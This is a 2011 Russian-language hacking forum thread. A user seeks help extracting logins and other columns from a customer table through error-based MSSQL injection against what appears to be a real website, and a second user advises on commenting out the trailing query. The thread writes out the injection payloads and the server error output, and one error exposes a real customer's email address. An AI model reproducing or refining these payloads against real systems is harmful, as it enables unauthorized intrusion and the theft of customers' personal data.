Нужна помощь в MSSQL inj

Discussion in 'Болталка' started by Respekt(GreenSea), 11 Apr 2011.

  1. Respekt(GreenSea)

    Respekt(GreenSea) New Member

    Joined:
    13 Jul 2009
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Начинаю вытаскивать данные из колонки
    Email' все вытаскивается
    Syntax error converting the varchar value 'howe_min@163.com' to a column of data type int

    Как только перехожу к другим колонкам типа

    QuestionId','Times' начинает писать
    Запроc:
    (SELECT+TOP+1+Login+FROM+tCustomer)--
    лог:
    message: Incorrect syntax near the keyword 'And'.

    тоесть получается что я могу из таблицы tCustomer вытащить данные только из колонки Email' а в остальных пишет байду выше. В чем проблема может быть ? и есть ли возможность ее решить. Заранее спасибо.
     
  2. НTL

    НTL Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    715
    Likes Received:
    205
    Reputations:
    -26
    +--+ или */
    У тебя конец не комментируется
     
  3. Respekt(GreenSea)

    Respekt(GreenSea) New Member

    Joined:
    13 Jul 2009
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Провожу запрос типа
    =(SELECT+TOP+1+Login+FROM+tCustomer)
    Вывод
    =(SELECT TOP 1 Login FROM tCustomer)&pid=0) [function.fopen]: failed to open stream: HTTP request failed! HTTP/1.1 400 Bad Request in
    Warning: feof() expects parameter 1 to be resource, boolean given in
    Warning: fgets() expects parameter 1 to be resource, boolean given in D:\xampp\htdocs\
    Провожу запрос типа
    =(SELECT+TOP+1+Login+FROM+tCustomer)+--+
    Вывод
    Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near the keyword 'And'. (severity 15) in D:\xampp\htdocs\www\dglighting

    Пока не могу найти решение